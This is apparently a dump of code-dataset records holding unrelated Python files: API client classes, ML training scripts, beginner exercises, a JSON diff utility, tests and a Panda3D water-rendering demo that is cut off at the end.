received items count: {}'.format(pages.items_count))\n artifact_id = pages.items[0].id\n\n # create payload for request\n payload = {'name': checkpoint_name,\n 'description': description,\n 'modelId': self.model.id,\n 'projectId': project_id,\n 'artifactId': artifact_id,\n 'scope': scope}\n\n # request\n success, response = self._client_api.gen_request(req_type='post',\n path='/checkpoints',\n json_req=payload)\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n checkpoint = entities.Checkpoint.from_json(_json=response.json(),\n client_api=self._client_api,\n project=self._project,\n model=self.model)\n return checkpoint\n\n def download(self, checkpoint_id=None, checkpoint=None, local_path=None):\n if checkpoint is None:\n if checkpoint_id is None:\n raise exceptions.PlatformException('400', 'Please provide checkpoint or checkpoint id')\n checkpoint = self.get(checkpoint_id=checkpoint_id)\n\n if local_path is None:\n local_path = os.getcwd()\n\n checkpoint_artifact_item = self.artifacts.get(artifact_id=checkpoint.artifacts_id)\n if checkpoint_artifact_item.type == 'dir':\n filters = entities.Filters(field='dir', values='{}*'.format(checkpoint_artifact_item.filename))\n artifacts = self.artifacts.items_repository.download(filters=filters,\n local_path=local_path,\n to_items_folder=False,\n without_relative_path=checkpoint_artifact_item.filename)\n else:\n artifacts = checkpoint_artifact_item.download(local_path=local_path)\n return artifacts\n\n def delete(self, checkpoint=None, checkpoint_name=None, checkpoint_id=None):\n \"\"\"\n Delete Checkpoint object\n\n :param checkpoint:\n :param checkpoint_name:\n :param checkpoint_id:\n :return: True\n \"\"\"\n # get id and name\n if checkpoint is None:\n checkpoint = self.get(checkpoint_id=checkpoint_id, checkpoint_name=checkpoint_name)\n try:\n self.artifacts.items_repository.delete(item_id=checkpoint.artifacts_id)\n except exceptions.NotFound:\n pass\n\n # request\n success, response = self._client_api.gen_request(\n req_type=\"delete\",\n path=\"/checkpoints/{}\".format(checkpoint.id)\n )\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n # return results\n return True\n\n def update(self, checkpoint):\n \"\"\"\n Update Checkpoint changes to platform\n\n :param checkpoint:\n :return: Checkpoint entity\n \"\"\"\n assert isinstance(checkpoint, entities.Checkpoint)\n\n # payload\n payload = checkpoint.to_json()\n\n # request\n success, response = self._client_api.gen_request(req_type='patch',\n path='/checkpoints/{}'.format(checkpoint.id),\n json_req=payload)\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n # return entity\n return entities.Checkpoint.from_json(_json=response.json(),\n client_api=self._client_api,\n project=self._project,\n model=self.model)\n","sub_path":"dtlpy/repositories/checkpoints.py","file_name":"checkpoints.py","file_ext":"py","file_size_in_byte":10133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"563266068","text":"import logging\nfrom urllib.parse import urljoin\nfrom json.decoder import JSONDecodeError\n\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\nclass BaseEndpoint:\n \"\"\"\n Base class for Actionstep endpoints.\n\n FIXME: Handle expired token race condition\n \"\"\"\n\n resource = None\n\n def __init__(self, base_url: str, access_token: str):\n self.rest_url = urljoin(base_url, \"rest\") + \"/\"\n self.url = 
urljoin(self.rest_url, self.resource) + \"/\"\n        self.headers = {\n            \"Content-Type\": \"application/vnd.api+json\",\n            \"Accept\": \"application/vnd.api+json\",\n            \"Authorization\": f\"Bearer {access_token}\",\n        }\n\n    def get(self, params=None) -> dict:\n        \"\"\"\n        Gets a resource, filtered by params.\n        Returns a dict or None.\n        \"\"\"\n        objs = self.list(params)\n        if not objs:\n            # Empty list.\n            return None\n        else:\n            # Non-empty list.\n            assert len(objs) == 1, f\"Wrong number of objs for get: {objs}\"\n            return objs[0]\n\n    def list(self, params=None) -> list:\n        \"\"\"\n        Get a resource, filtered by params.\n        Returns a list of results.\n        \"\"\"\n        return self._list(self.url, params)\n\n    def _list(self, url, params=None) -> list:\n        resp = requests.get(url, params=params, headers=self.headers)\n        response_data = self._handle_json_response(url, resp)\n        if not response_data:\n            # Nothing found.\n            return []\n\n        data = response_data[self.resource]\n        results = []\n        results += data if type(data) is list else [data]\n        try:\n            paging = response_data[\"meta\"][\"paging\"][self.resource]\n        except (TypeError, KeyError):\n            paging = None\n\n        if paging and paging[\"nextPage\"]:\n            results += self._list(paging[\"nextPage\"])\n\n        return results\n\n    def create(self, data: dict):\n        \"\"\"\n        Create a resource with provided data.\n        Returns the created object.\n        \"\"\"\n        url = self.url\n        request_data = {self.resource: [data]}\n        resp = requests.post(url, json=request_data, headers=self.headers)\n        response_data = self._handle_json_response(url, resp)\n        return response_data[self.resource]\n\n    def update(self, resource_id: str, data: dict):\n        \"\"\"\n        Update data in an existing resource.\n        Returns the updated object.\n        \"\"\"\n        url = urljoin(self.url, str(resource_id))\n        request_data = {self.resource: [data]}\n        # fixed: was json=data, which left the wrapped request_data unused (see create())\n        resp = requests.put(url, json=request_data, headers=self.headers)\n        response_data = self._handle_json_response(url, resp)\n        return response_data[self.resource]\n\n    def delete(self, resource_id: str):\n        \"\"\"\n        Delete an existing resource.\n        May result in a soft-delete.\n        Returns None\n        \"\"\"\n        url = urljoin(self.url, str(resource_id))\n        resp = requests.delete(url, headers=self.headers)\n        self._handle_json_response(url, resp)\n\n    def _handle_json_response(self, url, resp):\n        json = self._try_json_decode(resp)\n        try:\n            resp.raise_for_status()\n        except requests.HTTPError:\n            logger.exception(\"Actionstep API call failed: %s\", json)\n            raise\n\n        return json\n\n    def _try_json_decode(self, resp):\n        if resp.status_code == 204:\n            # No content\n            return None\n        else:\n            return resp.json()\n\n","sub_path":"app/actionstep/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"122033587","text":"\n\nfrom xai.brain.wordbase.verbs._cloy import _CLOY\n\n#class header\nclass _CLOYS(_CLOY, ):\n\tdef __init__(self,): \n\t\t_CLOY.__init__(self)\n\t\tself.name = \"CLOYS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"cloy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_cloys.py","file_name":"_cloys.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61171391","text":"import tensorflow as tf\n\nfrom .registry import register\nfrom .utils import HParams\n\n\n@register\ndef default():\n  return HParams(\n      model=None,\n      data=None,\n      shuffle_data=True,\n      data_augmentations=None,\n      train_steps=100000,\n      
eval_steps=100,\n type=\"image\",\n batch_size=64,\n learning_rate=0.01,\n lr_scheme=\"constant\",\n initializer=\"glorot_normal_initializer\",\n delay=0,\n staircased=False,\n learning_rate_decay_interval=2000,\n learning_rate_decay_rate=0.1,\n clip_grad_norm=1.0,\n l2_loss=0.0,\n prune_val=0.8,\n label_smoothing=0.1,\n use_tpu=False,\n momentum=0.9,\n init_scheme=\"random\",\n warmup_steps=10000,\n use_nesterov=False,\n louizos_cost=0.0,\n l1_norm=0.0,\n thresh=2.5,\n fixed=False,\n var_scale=1,\n klscale=1.0,\n ard_cost=0.0,\n logit_packing=0.0,\n logit_squeezing=0.0,\n clp=0.0,\n logit_bound=None,\n dropout_type=None,\n smallify=0.0,\n smallify_delay=1000,\n linear_drop_rate=False,\n weight_decay_and_noise=False,\n dropout_delay_steps=5000,\n grad_noise_scale=0.0,\n td_nines=0,\n targ_cost=1.0,\n aparams=\"\",\n channels=1)\n\n\n@register\ndef default_cifar10():\n hps = default()\n hps.data = \"cifar10\"\n hps.data_augmentations = [\"image_augmentation\"]\n\n hps.input_shape = [32, 32, 3]\n hps.output_shape = [10]\n hps.channels = 3\n hps.num_classes = 10\n\n return hps\n\n\n@register\ndef default_cifar100():\n hps = default()\n hps.data = \"cifar100\"\n hps.data_augmentations = [\"image_augmentation\"]\n\n hps.input_shape = [32, 32, 3]\n hps.output_shape = [100]\n hps.num_classes = 100\n hps.channels = 3\n\n return hps\n","sub_path":"hparams/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318571879","text":"def esDiagonal(horizontal, vertical):\n \"\"\" int, int -> bool\n OBJ: Retorna un bool si la casilla esta en la vertical del tablero\"\"\"\n return horizontal == vertical\n \n\ndef esImparPar(horizontal, vertical):\n \"\"\" int, int -> str\n OBJ: Imprime si dos coordenadas estan en casilla par o impar\"\"\"\n if (horizontal + vertical) % 2 == 0:\n return \"Impar\"\n else:\n return \"Par\"\n \ndef esDiagonalInversa(horizontal, vertical, tamaño_tablero):\n \"\"\"int, int, int -> bool\n OBJ: Detemina dos coordenas estan en la diagonal inversaa\n \"\"\"\n return (horizontal + vertical) == tamaño_tablero\n \ndef esEntero():\n \"\"\" none -> int\n OBJ: pide un valor y lo retorna solo si es entero\"\"\"\n \n numero = input(\"Introduce un entero-positivo: \")\n \n while type(numero) != int:\n \n try:\n numero = int(numero)\n \n except:\n print(\"2\")\n print(\"El numero introducido no es valido\")\n \n numero = input(\"Introduce un entero-positivo: \")\n \n return numero\n \ndef esPositivo():\n \"\"\" none -> int > 0\n OBJ: detemina si un int es mayor que 0\"\"\"\n \n numero = esEntero()\n\n while numero < 0:\n numero = esEntero()\n \n return numero\n \ndef mostrarTablero(tamaño_tablero):\n \"\"\" int -> none\n OBJ: muestra un tablero en funcion de un tamaño\"\"\"\n \n for i in range(0,tamaño_tablero):\n for j in range(0,tamaño_tablero):\n if esDiagonal(i,j):\n print(\"#\", end=\"\")\n \n elif esDiagonalInversa(i,j, tamaño_tablero-1):\n print(\"$\", end=\"\")\n \n elif esImparPar(i,j) == \"Impar\":\n print(\"O\", end=\"\")\n else:\n print(\"X\", end=\"\") \n print()\n \n\ntamaño_tablero = esPositivo()\nmostrarTablero(tamaño_tablero)\n","sub_path":"laboratorio/EjerciciosExamen/problema2-4.py","file_name":"problema2-4.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554980507","text":"#Exercício 3\n\nvoto=int(input(\"Insira o seu voto (1, 2, 3 ,4), (0 para 
voto nulo), (9 para voto em branco) e (-1 para terminar) : \"))\ncandidato1 = 0\ncandidato2 = 0\ncandidato3 = 0\ncandidato4 = 0\nvotobranco = 0\nvotonulo = 0\nwhile voto != -1:\n    if voto == 1:\n        candidato1 += 1\n    if voto == 2:\n        candidato2 += 1\n    if voto == 3:\n        candidato3 += 1\n    if voto == 4:\n        candidato4 += 1\n    # per the prompt, 0 = voto nulo and 9 = voto em branco; the counters were swapped\n    if voto == 0:\n        votonulo += 1\n    if voto == 9:\n        votobranco += 1\n    voto=int(input(\"Insira o seu voto (1, 2, 3 ,4), (0 para voto nulo), (9 para voto em branco) e (-1 para terminar) : \"))\n\ntotalvotos= candidato1 + candidato2 + candidato3 + candidato4 + votonulo + votobranco\npercentagem_candidato1 = (candidato1 * 100) / totalvotos\npercentagem_candidato2 = (candidato2 * 100) / totalvotos\npercentagem_candidato3 = (candidato3 * 100) / totalvotos\npercentagem_candidato4 = (candidato4 * 100) / totalvotos\npercentagem_branco = (votobranco * 100) / totalvotos\npercentagem_nulo = (votonulo * 100) / totalvotos\n\nprint(\"O total de votos desta eleição são : {}\".format(totalvotos))\nprint(\"O total de votos para o candidato 1 são : {}\".format(candidato1))\nprint(\"O total de votos para o candidato 2 são : {}\".format(candidato2))\nprint(\"O total de votos para o candidato 3 são : {}\".format(candidato3))\nprint(\"O total de votos para o candidato 4 são : {}\".format(candidato4))\nprint(\"O total de votos em branco são : {}\".format(votobranco))\nprint(\"O total de votos nulos são : {}\".format(votonulo))\nprint(\"A percentagem de votos para o candidato 1 são : {} %\".format(percentagem_candidato1))\nprint(\"A percentagem de votos para o candidato 2 são : {} %\".format(percentagem_candidato2))\nprint(\"A percentagem de votos para o candidato 3 são : {} %\".format(percentagem_candidato3))\nprint(\"A percentagem de votos para o candidato 4 são : {} %\".format(percentagem_candidato4))\nprint(\"A percentagem de votos em branco são : {} %\".format(percentagem_branco))\nprint(\"A percentagem de votos nulos são : {} %\".format(percentagem_nulo))","sub_path":"ficha 3 entregar/Ex3.py","file_name":"Ex3.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"602960136","text":"first = {\"x\": 3, \"y\": 4, \"f\": [1, 3, {\"a\": 3}], \"z\": 22.3337, \"t\": 7, \"l\": \"qwe\"}\nsecond = {\"x\": 2, \"y\": 4, \"f\": [1, 3, {\"a\": 4}], \"z\": 22.33335, \"t\": 6}\n\n\ndef equal_reporter(obj1, obj2, path):\n    if isinstance(obj1, dict) and isinstance(obj2, dict):\n        diff = set(list(obj1)) ^ set(list(obj2))\n        if diff:\n            yield f\"path - {path}, mismatching keys {diff}\"\n        intersection = set(list(obj1)) & set(list(obj2))\n        for i in intersection:\n            p = path + f\"/{i}\"\n            yield from equal_reporter(obj1[i], obj2[i], p)\n    elif isinstance(obj1, list) and isinstance(obj2, list):\n        if len(obj1) != len(obj2):\n            yield f\"path - {path} Lists have different lengths {len(obj1)} != {len(obj2)}\"\n        else:\n            for k, v in enumerate(obj1):\n                p = path + f\"/[{k}]\"\n                yield from equal_reporter(v, obj2[k], p)\n    elif isinstance(obj1, int) and isinstance(obj2, int) and obj1 != obj2:\n        yield f\"path - {path}, {obj1} != {obj2}\"\n    elif isinstance(obj1, float) and isinstance(obj2, float):\n        if round(obj1, 5) != round(obj2, 5):\n            yield f\"path - {path}, {obj1} != {obj2}\"\n    elif isinstance(obj1, str) and isinstance(obj2, str) and obj1 != obj2:\n        yield f\"path - {path}, {obj1} != {obj2}\"\n    elif type(obj1) != type(obj2):\n        yield f\"path - {path}, type {type(obj1)} != {type(obj2)}\"\n\n\ndef is_equal(obj1, obj2):\n    diff = []\n    for x in 
equal_reporter(obj1, obj2, \"root\"):\n diff.append(x)\n print(\"RESULT: \")\n if diff:\n print(\"objects are not identical \\n\")\n for d in diff:\n print(d)\n else:\n print(\"objects are identical\")\n\n\nis_equal(first, second)\n","sub_path":"test1/json_comparison.py","file_name":"json_comparison.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360116300","text":"import json\nfrom os.path import join, exists\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\n\nfrom delphi_cdc_covidnet.api_config import APIConfig\nfrom delphi_cdc_covidnet.covidnet import CovidNet\n\n\nclass TestCovidNet:\n\n def test_mappings(self):\n with TemporaryDirectory() as temp_dir:\n init_file = join(temp_dir, \"init.json\")\n\n # Perform the download\n CovidNet.download_mappings(\n url=APIConfig.INIT_URL,\n outfile=init_file)\n\n assert exists(init_file)\n\n with open(init_file, \"r\") as f_json:\n mappings = json.load(f_json)\n\n # Check if the used keys are in the file\n used_keys = [\"catchments\", \"mmwr\", \"ages\"]\n for key in used_keys:\n assert key in mappings.keys(), f\"Key '{key}' missing from mappings\"\n\n catchment_info, mmwr_info, age_info = CovidNet.read_mappings(init_file)\n\n # Catchment columns\n catchment_cols = [\"networkid\", \"catchmentid\", \"area\", \"name\"]\n for col in catchment_cols:\n assert col in catchment_info.columns\n\n # MMWR columns\n mmwr_cols = [\"year\", \"weeknumber\", \"weekstart\", \"weekend\"]\n for col in mmwr_cols:\n assert col in mmwr_info.columns\n assert mmwr_info[\"weekstart\"].dtype == np.dtype(\"datetime64[ns]\")\n assert mmwr_info[\"weekend\"].dtype == np.dtype(\"datetime64[ns]\")\n assert (mmwr_info[\"weekstart\"] < mmwr_info[\"weekend\"]).all()\n\n # Age columns\n age_cols = [\"ageid\", \"parentid\", \"label\"]\n for col in age_cols:\n assert col in age_info.columns\n assert (age_info[\"label\"] == \"Overall\").any(), \"Missing overall age-group\"\n\n def test_hosp_data(self):\n # Download mappings file\n with TemporaryDirectory() as temp_dir:\n init_file = join(temp_dir, \"init.json\")\n CovidNet.download_mappings(\n url=APIConfig.INIT_URL,\n outfile=init_file)\n catchment_info, _, _ = CovidNet.read_mappings(init_file)\n\n # Download all state files\n states_idx = catchment_info[\"area\"] != \"Entire Network\"\n num_states = states_idx.sum()\n\n # Non-parallel\n state_files = CovidNet.download_all_hosp_data(\n init_file, temp_dir, parallel=False)\n assert len(state_files) == num_states\n for state_file in state_files:\n assert exists(state_file)\n\n # Parallel\n state_files_par = CovidNet.download_all_hosp_data(\n init_file, temp_dir, parallel=True)\n assert set(state_files) == set(state_files_par)\n assert len(state_files_par) == num_states\n for state_file in state_files_par:\n assert exists(state_file)\n\n # Run the combining function\n hosp_df = CovidNet.read_all_hosp_data(state_files)\n\n # Check all used columns are there\n df_cols = [\"mmwr-year\", \"mmwr-week\", \"catchment\", \"cumulative-rate\"]\n for col in df_cols:\n assert col in hosp_df.columns, f\"Column '{col}' missing from dataframe\"\n\n # Verify we indeed have data for each state we downloaded for\n assert set(hosp_df[\"catchment\"].unique()) == set(catchment_info.loc[states_idx, 
\"area\"])\n","sub_path":"cdc_covidnet/tests/test_covidnet.py","file_name":"test_covidnet.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329556670","text":"import sklearn\nimport tensorflow as tf\nfrom keras import Sequential, Input, Model\nfrom keras.layers import Dense\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nfrom mp3tagger.training.utils import load_data, preprocessing\n\ndef model_baseline():\n inputs = Input(shape=(13,))\n x = Dense(100, activation='sigmoid', kernel_initializer='he_normal')(inputs)\n outputs = Dense(3, activation='softmax', kernel_initializer='he_normal')(x)\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\ndf = load_data()\ndf = preprocessing(df)\n\nx, y = shuffle(df.to_numpy()[:,:-1], df.to_numpy()[:,-1])\nx_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.2, random_state=40)\n\n# 使用Feature Scaling後準確率上升快2%!\nuse_standardization = True\nuse_normalization = True\n\nif use_standardization:\n x_train = sklearn.preprocessing.scale(x_train)\n x_val = sklearn.preprocessing.scale(x_val)\nif use_normalization:\n x_train = sklearn.preprocessing.scale(x_train)\n x_val = sklearn.preprocessing.scale(x_val)\n\n# epochs大約在50就收斂了\n# batch_size大一點accuracy會比較穩定\n# batch_size大約在75~100間\nmodel = model_baseline()\nresult = model.fit(x_train, y_train, epochs=50, batch_size=100, verbose=2,\n validation_data=(x_val, y_val))\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(211)\nax2 = fig.add_subplot(212)\n\nax1.plot(result.epoch, result.history['accuracy'], color='blue',\n linewidth=3, label='train acc')\nax1.plot(result.epoch, result.history['val_accuracy'], color='magenta',\n linewidth=3, label='val acc')\n\nax2.plot(result.epoch, result.history['loss'], color='blue',\n linewidth=3, label='train loss')\nax2.plot(result.epoch, result.history['val_loss'], color='magenta',\n linewidth=3, label='val loss')\nax1.legend()\nax1.set_xlabel('epochs')\nax1.set_ylabel('Accuracy')\nax1.set_ylim([0.825, 1])\nax2.legend()\nax2.set_xlabel('epochs')\nax2.set_ylabel('Loss')\nax2.set_ylim([0.1, 0.5])\nplt.show()\n# loss, acc = four_layer.evaluate(x_test, y_test, verbose=1)\n\n\n\n\n\nprint('')\n\n","sub_path":"mp3tagger/training/models/obsolete/mlp_baseline.py","file_name":"mlp_baseline.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157354799","text":"from os import path\nfrom io import BytesIO\nfrom typing import Union\n\nimport numpy as np\nfrom PIL import Image\nfrom cloudfiles import CloudFiles\nfrom cloudvolume import Storage\n\n\ndef _load_image(p: bytes):\n \"\"\"\n Open TIF image and convert to numpy ndarray of dtype.\n Currently tested for only for uint8 -> uint8, uint32 or uint24 -> uint32\n \"\"\"\n img_arr = np.array(Image.open(BytesIO(p)))\n if len(img_arr.shape) == 3:\n img_arr = np.dstack((np.zeros(img_arr.shape[:2] + (1,)), img_arr))\n img_arr = img_arr[:, :, ::-1]\n img_arr = img_arr.astype(np.uint8).view(np.uint32)\n img_arr = img_arr.reshape(img_arr.shape[:2]).T\n return img_arr.astype(np.uint32)\n\n\ndef load_images(p: str, extension: str = \"tif\") -> dict:\n \"\"\"Assume directory contains only the images to be stored\"\"\"\n files = CloudFiles(p)\n names = []\n for f in 
sorted(files.list()):\n if extension in f:\n names.append(f)\n\n files.get(names, raw=True)\n files_bytes = [files[k] for k in names]\n\n imgs = []\n for f in files_bytes:\n imgs.append(_load_image(f))\n return {\"seg\": np.asarray(imgs).transpose(2, 1, 0)}\n\n\ndef load_from_omni_h5(f) -> dict:\n from h5py import File\n\n omni_types = {\"working\": 1, \"valid\": 2, \"uncertain\": 3}\n dirpath = path.split(f)[0]\n with File(f, \"r\") as f:\n data = np.squeeze(np.array(f[\"main\"])).transpose(2, 1, 0)\n if len(data.shape) > 3:\n print(\"only support 3 dimensional dataset\")\n return None\n if data.dtype == np.uint8 or data.dtype == np.float32:\n return {\"raw_image\": data}\n try:\n seg_type = np.loadtxt(\n path.join(dirpath, \"segments.txt\"),\n dtype=(int, int),\n delimiter=\",\",\n skiprows=2,\n )\n except IOError:\n return {\"seg\": data.astype(np.uint32)}\n\n seg_data = {\"seg\": data.astype(np.uint32)}\n seg_type = dict(seg_type)\n for k in omni_types:\n seg = np.copy(data)\n fltr = np.vectorize(\n lambda x: True\n if x not in seg_type or seg_type[x] != omni_types[k]\n else False\n )\n mask = fltr(seg)\n seg[mask] = 0\n seg_data[k] = seg.astype(np.uint32)\n return seg_data\n\n\ndef write_to_dir(dst_dir, img_arr, extension=\"tif\"):\n \"\"\"Split 3d ndimgay along z dim into 2d sections & save as tifs\"\"\"\n for k in range(img_arr.shape[2]):\n f = path.join(dst_dir, \"{0:03d}.{1}\".format(k + 1, extension))\n img = Image.fromarray(img_arr[:, :, k].T)\n img.save(f)\n\n\ndef write_to_cloud_bucket(dst_dir, img_arr, extension=\"tif\"):\n cf = CloudFiles(dst_dir)\n for k in range(img_arr.shape[2]):\n img = Image.fromarray(img_arr[:, :, k].T)\n img_bytes = BytesIO()\n img.save(img_bytes, format=\"tiff\" if extension == \"tif\" else extension)\n cf.put(\"{0:03d}.{1}\".format(k + 1, extension), img_bytes.getvalue())\n","sub_path":"specialized-workers/groudtruth/src/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608370294","text":"'''\nCreated on 03/mar/2012\n\n@author: consultit\n'''\n\nfrom panda3d.core import Vec4, GeoMipTerrain,TextureStage, \\\n Vec3, TransparencyAttrib, NodePath, \\\n Texture, Point3, CardMaker, TextNode, DirectionalLight, \\\n AmbientLight, Filename, BitMask32, WindowProperties, \\\n LPlanef, PlaneNode, CullFaceAttrib, RenderState, \\\n ShaderAttrib, PandaNode, CollisionTraverser, CollisionRay, \\\n CollisionNode, CollisionHandlerQueue,loadPrcFileData, \\\n loadPrcFile\n\nloadPrcFile(\"../config.prc\")\n#loadPrcFileData(\"\", \"direct-gui-edit #t\")\n#loadPrcFileData(\"\", \"want-directtools #t\")\n#loadPrcFileData(\"\", \"want-tk #t\")\n#loadPrcFileData(\"\", \"task-timer-verbose #t\")\n#loadPrcFileData(\"\", \"fullscreen #t\")\nloadPrcFileData(\"\", \"threading-model Cull/Draw\")\n#loadPrcFileData(\"\", \"want-pstats 1\")\n\n#from panda3d.core import *\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.gui.DirectGui import *\nfrom direct.actor.Actor import Actor\nfrom direct.task import Task\n\nimport sys, os\n\nSPEED = 0.5\n\n# Figure out what directory this program is in.\nMYDIR = os.path.abspath(sys.path[0])\nMYDIR = Filename.fromOsSpecific(MYDIR).getFullpath()\nprint('running from:' + MYDIR)\n\n# Function to put instructions on the screen.\ndef addInstructions(pos, msg):\n return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1),\n pos=(-1.3, pos), align=TextNode.ALeft, scale=.05)\n\ndef addTextField(pos, msg):\n return 
OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1),\n pos=(-1.3, pos), align=TextNode.ALeft, scale=.05, mayChange=True)\n\n# Function to put title on the screen.\ndef addTitle(text):\n return OnscreenText(text=text, style=1, fg=(1, 1, 1, 1),\n pos=(1.3, -0.95), align=TextNode.ARight, scale=.07)\n \nclass WaterNode():\n def __init__(self, world, x1, y1, x2, y2, z):\n print('setting up water plane at z=' + str(z))\n \n # Water surface\n maker = CardMaker('water')\n maker.setFrame(x1, x2, y1, y2)\n\n world.waterNP = world.render.attachNewNode(maker.generate())\n world.waterNP.setHpr(0, -90, 0)\n world.waterNP.setPos(0, 0, z)\n world.waterNP.setTransparency(TransparencyAttrib.MAlpha)\n world.waterNP.setShader(world.loader.loadShader('../Shaders/water.cg'))\n world.waterNP.setShaderInput('wateranim', Vec4(0.03, -0.015, 64.0, 0)) # vx, vy, scale, skip\n # offset, strength, refraction factor (0=perfect mirror, 1=total refraction), refractivity\n world.waterNP.setShaderInput('waterdistort', Vec4(0.4, 4.0, 0.4, 0.45)) \n\n # Reflection plane\n world.waterPlane = LPlanef(Vec3(0, 0, z + 1), Point3(0, 0, z))\n \n planeNode = PlaneNode('waterPlane')\n planeNode.setPlane(world.waterPlane)\n \n # Buffer and reflection camera\n bufferRefl = world.win.makeTextureBuffer('waterBuffer', 512, 512)\n bufferRefl.setClearColor(Vec4(0, 0, 0, 1))\n\n cfa = CullFaceAttrib.makeReverse()\n rs = RenderState.make(cfa)\n\n world.watercamNP = world.makeCamera(bufferRefl)\n world.watercamNP.reparentTo(world.render)\n \n sa = ShaderAttrib.make()\n sa = sa.setShader(world.loader.loadShader('../Shaders/splut3Clipped.cg'))\n\n cam = world.watercamNP.node()\n cam.getLens().setFov(world.camLens.getFov())\n cam.getLens().setNear(1)\n cam.getLens().setFar(5000)\n cam.setInitialState(rs)\n cam.setTagStateKey('Clipped')\n cam.setTagState('True', RenderState.make(sa)) \n\n\n # ---- water textures ---------------------------------------------\n\n # reflection texture, created in realtime by the 'water camera'\n tex0 = bufferRefl.getTexture()\n tex0.setWrapU(Texture.WMClamp)\n tex0.setWrapV(Texture.WMClamp)\n ts0 = TextureStage('reflection')\n world.waterNP.setTexture(ts0, tex0) \n\n # distortion texture\n tex1 = world.loader.loadTexture('../Textures/water.png')\n ts1 = TextureStage('distortion')\n world.waterNP.setTexture(ts1, tex1)\n \nclass myGeoMipTerrain(GeoMipTerrain):\n def __init__(self, name, loader):\n GeoMipTerrain.__init__(self, name)\n self.loader = loader\n \n def update(self, dummy):\n GeoMipTerrain.update(self)\n \n def setMonoTexture(self):\n root = self.getRoot()\n ts = TextureStage('ts')\n tex = self.loader.loadTexture('../Textures/land01_tx_512.png')\n root.setTexture(ts, tex)\n \n def setMultiTexture(self):\n root = self.getRoot()\n # root.setShader(loader.loadShader('../Shaders/splut3.sha'))\n root.setShaderInput('tscale', Vec4(16.0, 16.0, 16.0, 1.0)) # texture scaling\n\n tex1 = self.loader.loadTexture('../Textures/grass_ground2.jpg')\n #tex1.setMinfilter(Texture.FTLinearMipmapLinear)\n tex1.setMinfilter(Texture.FTNearestMipmapLinear)\n tex1.setMagfilter(Texture.FTLinear)\n tex2 = self.loader.loadTexture('../Textures/rock_02.jpg')\n tex2.setMinfilter(Texture.FTNearestMipmapLinear)\n tex2.setMagfilter(Texture.FTLinear)\n tex3 = self.loader.loadTexture('../Textures/sable_et_gravier.jpg')\n tex3.setMinfilter(Texture.FTNearestMipmapLinear)\n tex3.setMagfilter(Texture.FTLinear)\n\n alp1 = self.loader.loadTexture('../Textures/land01_Alpha_1.png')\n alp2 = self.loader.loadTexture('../Textures/land01_Alpha_2.png')\n alp3 = 
self.loader.loadTexture('../Textures/land01_Alpha_3.png')\n\n        ts = TextureStage('tex1') # stage 0\n        root.setTexture(ts, tex1) \n        ts = TextureStage('tex2') # stage 1\n        root.setTexture(ts, tex2)\n        ts = TextureStage('tex3') # stage 2\n        root.setTexture(ts, tex3)\n\n        ts = TextureStage('alp1') # stage 3\n        root.setTexture(ts, alp1)\n        ts = TextureStage('alp2') # stage 4\n        root.setTexture(ts, alp2)\n        ts = TextureStage('alp3') # stage 5\n        root.setTexture(ts, alp3)\n\n        # enable use of the two separate tagged render states for our two cameras\n        root.setTag('Normal', 'True') \n        root.setTag('Clipped', 'True') \n\nclass World(ShowBase):\n\n    def setMouseBtn(self, btn, value):\n        self.mousebtn[btn] = value\n\n    def _setup_camera(self):\n        \n        sa = ShaderAttrib.make()\n        sa = sa.setShader(self.loader.loadShader('../Shaders/splut3Normal.cg'))\n        \n        cam = self.cam.node()\n        cam.getLens().setNear(1)\n        cam.getLens().setFar(5000)\n        cam.setTagStateKey('Normal') \n        cam.setTagState('True', RenderState.make(sa)) \n\n    def __init__(self):\n        \n        ShowBase.__init__(self)\n        \n        # some constants\n        self._water_level = Vec4(0.0, 0.0, 12.0, 1.0)\n        \n        print(str(self.win.getGsg().getMaxTextureStages()) + ' texture stages available')\n        self.setFrameRateMeter(True)\n        # PStatClient.connect()\n        \n        self.keyMap = \\\n            {\"left\":0, \"right\":0, \"forward\":0, \"cam-left\":0, \\\n             \"cam-right\":0, \"cam-up\":0, \"cam-down\":0, \"mouse\":0 }\n        \n        self.win.setClearColor(Vec4(0, 0, 0, 1))\n        \n        # Post the instructions\n        self.title = 